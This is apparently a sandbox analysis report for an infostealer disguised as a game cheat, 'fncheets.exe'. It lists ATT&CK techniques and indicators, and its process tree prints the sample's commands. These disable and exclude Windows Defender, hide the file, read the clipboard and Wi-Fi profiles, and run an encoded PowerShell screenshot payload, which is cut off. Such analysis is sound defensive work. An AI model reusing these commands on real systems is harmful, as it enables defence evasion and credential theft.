85e1b46e08e60f8463272bcc010ee483e2a9947a9c018e2ce178fa3558218869

Analysis

max time kernel
30s
max time network
31s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14-09-2024 00:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fncheets.exe
Size

6.9MB
MD5

cd4aaaf8df2eb9f5017a591a325de881
SHA1

f4499567ebc3987bc11140f9fe91854e31553acf
SHA256

85e1b46e08e60f8463272bcc010ee483e2a9947a9c018e2ce178fa3558218869
SHA512

44e3bb70a1314a0c3e29071562e99fdec6d4c907e05e4634034369ce4779df4d6142e5216a5d492f0e0a043634244172add3f8f6768806a2af56233292fec792
SSDEEP

98304:D9vITBgZ7amaHl3Ne4i3lqoFhTWrf9eQc0MJYzwZNqkzQZs5J1n6ksBnrNAM5:DpI3eNlpYfMQc2sJhn6ksV/

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3520	powershell.exe
2128	powershell.exe
5052	powershell.exe
3144	powershell.exe
5016	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	fncheets.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4988	cmd.exe
1080	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3044	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe
1704	fncheets.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x000700000002344c-21.dat	upx
behavioral3/memory/1704-25-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp	upx
behavioral3/files/0x000700000002343f-28.dat	upx
behavioral3/memory/1704-30-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp	upx
behavioral3/files/0x0007000000023446-47.dat	upx
behavioral3/memory/1704-48-0x00007FFA945E0000-0x00007FFA945EF000-memory.dmp	upx
behavioral3/files/0x0007000000023445-46.dat	upx
behavioral3/files/0x0007000000023444-45.dat	upx
behavioral3/files/0x0007000000023443-44.dat	upx
behavioral3/files/0x0007000000023442-43.dat	upx
behavioral3/files/0x0007000000023441-42.dat	upx
behavioral3/files/0x0007000000023440-41.dat	upx
behavioral3/files/0x000700000002343e-40.dat	upx
behavioral3/files/0x0007000000023451-39.dat	upx
behavioral3/files/0x0007000000023450-38.dat	upx
behavioral3/files/0x000700000002344f-37.dat	upx
behavioral3/files/0x000700000002344b-34.dat	upx
behavioral3/files/0x0007000000023449-33.dat	upx
behavioral3/files/0x000700000002344a-29.dat	upx
behavioral3/memory/1704-54-0x00007FFA8EA70000-0x00007FFA8EA9D000-memory.dmp	upx
behavioral3/memory/1704-56-0x00007FFA92BA0000-0x00007FFA92BB9000-memory.dmp	upx
behavioral3/memory/1704-60-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp	upx
behavioral3/memory/1704-58-0x00007FFA8BA80000-0x00007FFA8BAA3000-memory.dmp	upx
behavioral3/memory/1704-62-0x00007FFA8BA60000-0x00007FFA8BA79000-memory.dmp	upx
behavioral3/memory/1704-64-0x00007FFA8EF10000-0x00007FFA8EF1D000-memory.dmp	upx
behavioral3/memory/1704-66-0x00007FFA8B380000-0x00007FFA8B3AE000-memory.dmp	upx
behavioral3/memory/1704-70-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp	upx
behavioral3/memory/1704-74-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp	upx
behavioral3/memory/1704-73-0x00007FFA7B640000-0x00007FFA7B9B5000-memory.dmp	upx
behavioral3/memory/1704-71-0x00007FFA8AF80000-0x00007FFA8B038000-memory.dmp	upx
behavioral3/memory/1704-76-0x00007FFA8B840000-0x00007FFA8B854000-memory.dmp	upx
behavioral3/memory/1704-78-0x00007FFA8BB90000-0x00007FFA8BB9D000-memory.dmp	upx
behavioral3/memory/1704-80-0x00007FFA7B520000-0x00007FFA7B63C000-memory.dmp	upx
behavioral3/memory/1704-106-0x00007FFA8BA80000-0x00007FFA8BAA3000-memory.dmp	upx
behavioral3/memory/1704-119-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp	upx
behavioral3/memory/1704-177-0x00007FFA8BA60000-0x00007FFA8BA79000-memory.dmp	upx
behavioral3/memory/1704-260-0x00007FFA8B380000-0x00007FFA8B3AE000-memory.dmp	upx
behavioral3/memory/1704-264-0x00007FFA8AF80000-0x00007FFA8B038000-memory.dmp	upx
behavioral3/memory/1704-279-0x00007FFA7B640000-0x00007FFA7B9B5000-memory.dmp	upx
behavioral3/memory/1704-299-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp	upx
behavioral3/memory/1704-305-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp	upx
behavioral3/memory/1704-300-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp	upx
behavioral3/memory/1704-335-0x00007FFA8BA80000-0x00007FFA8BAA3000-memory.dmp	upx
behavioral3/memory/1704-340-0x00007FFA8AF80000-0x00007FFA8B038000-memory.dmp	upx
behavioral3/memory/1704-339-0x00007FFA8B380000-0x00007FFA8B3AE000-memory.dmp	upx
behavioral3/memory/1704-338-0x00007FFA8EF10000-0x00007FFA8EF1D000-memory.dmp	upx
behavioral3/memory/1704-337-0x00007FFA8BA60000-0x00007FFA8BA79000-memory.dmp	upx
behavioral3/memory/1704-336-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp	upx
behavioral3/memory/1704-334-0x00007FFA92BA0000-0x00007FFA92BB9000-memory.dmp	upx
behavioral3/memory/1704-333-0x00007FFA8EA70000-0x00007FFA8EA9D000-memory.dmp	upx
behavioral3/memory/1704-332-0x00007FFA945E0000-0x00007FFA945EF000-memory.dmp	upx
behavioral3/memory/1704-331-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp	upx
behavioral3/memory/1704-330-0x00007FFA7B640000-0x00007FFA7B9B5000-memory.dmp	upx
behavioral3/memory/1704-329-0x00007FFA7B520000-0x00007FFA7B63C000-memory.dmp	upx
behavioral3/memory/1704-328-0x00007FFA8BB90000-0x00007FFA8BB9D000-memory.dmp	upx
behavioral3/memory/1704-327-0x00007FFA8B840000-0x00007FFA8B854000-memory.dmp	upx
behavioral3/memory/1704-315-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4124	tasklist.exe
3120	tasklist.exe
3712	tasklist.exe
1064	tasklist.exe
4404	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1392	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3516	cmd.exe
3120	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
936	cmd.exe
3392	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4424	WMIC.exe
4972	WMIC.exe
4336	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3220	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3120	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3520	powershell.exe
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
3520	powershell.exe
3520	powershell.exe
5016	powershell.exe
5016	powershell.exe
1080	powershell.exe
1080	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
1080	powershell.exe
2128	powershell.exe
2128	powershell.exe
5104	powershell.exe
5104	powershell.exe
5052	powershell.exe
5052	powershell.exe
1376	powershell.exe
1376	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4124	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5032	WMIC.exe
Token: SeSecurityPrivilege	5032	WMIC.exe
Token: SeTakeOwnershipPrivilege	5032	WMIC.exe
Token: SeLoadDriverPrivilege	5032	WMIC.exe
Token: SeSystemProfilePrivilege	5032	WMIC.exe
Token: SeSystemtimePrivilege	5032	WMIC.exe
Token: SeProfSingleProcessPrivilege	5032	WMIC.exe
Token: SeIncBasePriorityPrivilege	5032	WMIC.exe
Token: SeCreatePagefilePrivilege	5032	WMIC.exe
Token: SeBackupPrivilege	5032	WMIC.exe
Token: SeRestorePrivilege	5032	WMIC.exe
Token: SeShutdownPrivilege	5032	WMIC.exe
Token: SeDebugPrivilege	5032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5032	WMIC.exe
Token: SeRemoteShutdownPrivilege	5032	WMIC.exe
Token: SeUndockPrivilege	5032	WMIC.exe
Token: SeManageVolumePrivilege	5032	WMIC.exe
Token: 33	5032	WMIC.exe
Token: 34	5032	WMIC.exe
Token: 35	5032	WMIC.exe
Token: 36	5032	WMIC.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	5032	WMIC.exe
Token: SeSecurityPrivilege	5032	WMIC.exe
Token: SeTakeOwnershipPrivilege	5032	WMIC.exe
Token: SeLoadDriverPrivilege	5032	WMIC.exe
Token: SeSystemProfilePrivilege	5032	WMIC.exe
Token: SeSystemtimePrivilege	5032	WMIC.exe
Token: SeProfSingleProcessPrivilege	5032	WMIC.exe
Token: SeIncBasePriorityPrivilege	5032	WMIC.exe
Token: SeCreatePagefilePrivilege	5032	WMIC.exe
Token: SeBackupPrivilege	5032	WMIC.exe
Token: SeRestorePrivilege	5032	WMIC.exe
Token: SeShutdownPrivilege	5032	WMIC.exe
Token: SeDebugPrivilege	5032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5032	WMIC.exe
Token: SeRemoteShutdownPrivilege	5032	WMIC.exe
Token: SeUndockPrivilege	5032	WMIC.exe
Token: SeManageVolumePrivilege	5032	WMIC.exe
Token: 33	5032	WMIC.exe
Token: 34	5032	WMIC.exe
Token: 35	5032	WMIC.exe
Token: 36	5032	WMIC.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4336	WMIC.exe
Token: SeSecurityPrivilege	4336	WMIC.exe
Token: SeTakeOwnershipPrivilege	4336	WMIC.exe
Token: SeLoadDriverPrivilege	4336	WMIC.exe
Token: SeSystemProfilePrivilege	4336	WMIC.exe
Token: SeSystemtimePrivilege	4336	WMIC.exe
Token: SeProfSingleProcessPrivilege	4336	WMIC.exe
Token: SeIncBasePriorityPrivilege	4336	WMIC.exe
Token: SeCreatePagefilePrivilege	4336	WMIC.exe
Token: SeBackupPrivilege	4336	WMIC.exe
Token: SeRestorePrivilege	4336	WMIC.exe
Token: SeShutdownPrivilege	4336	WMIC.exe
Token: SeDebugPrivilege	4336	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4336	WMIC.exe
Token: SeRemoteShutdownPrivilege	4336	WMIC.exe
Token: SeUndockPrivilege	4336	WMIC.exe
Token: SeManageVolumePrivilege	4336	WMIC.exe
Token: 33	4336	WMIC.exe
Token: 34	4336	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 1704	1184	fncheets.exe	83
PID 1184 wrote to memory of 1704	1184	fncheets.exe	83
PID 1704 wrote to memory of 1920	1704	fncheets.exe	87
PID 1704 wrote to memory of 1920	1704	fncheets.exe	87
PID 1704 wrote to memory of 1652	1704	fncheets.exe	88
PID 1704 wrote to memory of 1652	1704	fncheets.exe	88
PID 1704 wrote to memory of 624	1704	fncheets.exe	89
PID 1704 wrote to memory of 624	1704	fncheets.exe	89
PID 1704 wrote to memory of 4916	1704	fncheets.exe	93
PID 1704 wrote to memory of 4916	1704	fncheets.exe	93
PID 1704 wrote to memory of 1516	1704	fncheets.exe	95
PID 1704 wrote to memory of 1516	1704	fncheets.exe	95
PID 624 wrote to memory of 3760	624	cmd.exe	97
PID 624 wrote to memory of 3760	624	cmd.exe	97
PID 1920 wrote to memory of 3144	1920	cmd.exe	98
PID 1920 wrote to memory of 3144	1920	cmd.exe	98
PID 4916 wrote to memory of 4124	4916	cmd.exe	99
PID 4916 wrote to memory of 4124	4916	cmd.exe	99
PID 1516 wrote to memory of 5032	1516	cmd.exe	100
PID 1516 wrote to memory of 5032	1516	cmd.exe	100
PID 1652 wrote to memory of 3520	1652	cmd.exe	101
PID 1652 wrote to memory of 3520	1652	cmd.exe	101
PID 1704 wrote to memory of 1636	1704	fncheets.exe	103
PID 1704 wrote to memory of 1636	1704	fncheets.exe	103
PID 1636 wrote to memory of 3484	1636	cmd.exe	105
PID 1636 wrote to memory of 3484	1636	cmd.exe	105
PID 1704 wrote to memory of 4216	1704	fncheets.exe	106
PID 1704 wrote to memory of 4216	1704	fncheets.exe	106
PID 4216 wrote to memory of 4904	4216	cmd.exe	108
PID 4216 wrote to memory of 4904	4216	cmd.exe	108
PID 1704 wrote to memory of 2640	1704	fncheets.exe	109
PID 1704 wrote to memory of 2640	1704	fncheets.exe	109
PID 2640 wrote to memory of 4336	2640	cmd.exe	111
PID 2640 wrote to memory of 4336	2640	cmd.exe	111
PID 1704 wrote to memory of 4816	1704	fncheets.exe	112
PID 1704 wrote to memory of 4816	1704	fncheets.exe	112
PID 4816 wrote to memory of 4424	4816	cmd.exe	114
PID 4816 wrote to memory of 4424	4816	cmd.exe	114
PID 1704 wrote to memory of 1392	1704	fncheets.exe	115
PID 1704 wrote to memory of 1392	1704	fncheets.exe	115
PID 1704 wrote to memory of 3012	1704	fncheets.exe	117
PID 1704 wrote to memory of 3012	1704	fncheets.exe	117
PID 1392 wrote to memory of 2084	1392	cmd.exe	119
PID 1392 wrote to memory of 2084	1392	cmd.exe	119
PID 3012 wrote to memory of 5016	3012	cmd.exe	120
PID 3012 wrote to memory of 5016	3012	cmd.exe	120
PID 1704 wrote to memory of 2288	1704	fncheets.exe	121
PID 1704 wrote to memory of 2288	1704	fncheets.exe	121
PID 1704 wrote to memory of 1292	1704	fncheets.exe	122
PID 1704 wrote to memory of 1292	1704	fncheets.exe	122
PID 2288 wrote to memory of 3120	2288	cmd.exe	125
PID 2288 wrote to memory of 3120	2288	cmd.exe	125
PID 1292 wrote to memory of 3712	1292	cmd.exe	126
PID 1292 wrote to memory of 3712	1292	cmd.exe	126
PID 1704 wrote to memory of 4988	1704	fncheets.exe	128
PID 1704 wrote to memory of 4988	1704	fncheets.exe	128
PID 1704 wrote to memory of 1500	1704	fncheets.exe	127
PID 1704 wrote to memory of 1500	1704	fncheets.exe	127
PID 1704 wrote to memory of 2492	1704	fncheets.exe	129
PID 1704 wrote to memory of 2492	1704	fncheets.exe	129
PID 1704 wrote to memory of 4060	1704	fncheets.exe	133
PID 1704 wrote to memory of 4060	1704	fncheets.exe	133
PID 1704 wrote to memory of 936	1704	fncheets.exe	134
PID 1704 wrote to memory of 936	1704	fncheets.exe	134

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2084	attrib.exe
1272	attrib.exe
832	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fncheets.exe
"C:\Users\Admin\AppData\Local\Temp\fncheets.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Users\Admin\AppData\Local\Temp\fncheets.exe
  "C:\Users\Admin\AppData\Local\Temp\fncheets.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fncheets.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fncheets.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DONT HACK ME AGAIN!', 0, 'DONT HACK ME AGAIN!', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DONT HACK ME AGAIN!', 0, 'DONT HACK ME AGAIN!', 48+16);close()"
      4⤵
      PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4216
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\fncheets.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\fncheets.exe"
      4⤵
      Views/modifies file attributes
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1500
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2492
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:936
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5032
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2456
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsA